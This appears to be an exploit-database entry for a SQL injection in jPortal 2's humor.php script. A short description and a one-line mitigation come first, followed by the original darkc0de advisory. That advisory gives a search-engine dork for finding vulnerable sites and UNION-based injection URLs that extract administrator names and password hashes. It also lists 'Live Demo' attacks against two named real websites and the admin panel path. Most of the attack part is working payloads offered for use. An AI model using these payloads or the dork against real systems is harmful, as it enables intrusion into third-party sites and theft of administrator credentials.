jPORTAL 2 (humor.php) SQL Injection

vendor:

jPortal 2

by:

r45c4l

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: jPortal 2

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: a:jportal2:jportal2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2007

jPORTAL 2 (humor.php) SQL Injection

jPortal 2 is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords stored in the database. The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'id' parameter of the 'humor.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information stored in the database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being passed to the vulnerable script.

Source

Exploit-DB raw data:

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
#-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz        #
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: r45c4l 
# 
# Home  : www.darkc0de.com 
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title:  jPORTAL 2 (humor.php) SQL Injection
#
# VEndor: http://jportal2.com/
# 
#
###########################################################
#
# d0rk: intext:"jPORTAL 2" & inurl:"humor.php"
#
###########################################################
 
     POC 1:- 

        http://www.site.com/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+jp2admins--
	
    POC 2:- 

	http://www.site.com/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+admins--

  Table names may vary from jp2admins to admins 
     
     
     Live Demo: 
	
	http://www.domanski.pl/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+jp2admins--

	http://gimnazjum.webd.pl/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+admins--
 
    Admin panel: www.site.com/admin.php
 
###########################################################
#
#  Bug discovered : 21 Sep.2008
###########################################################

# milw0rm.com [2008-09-20]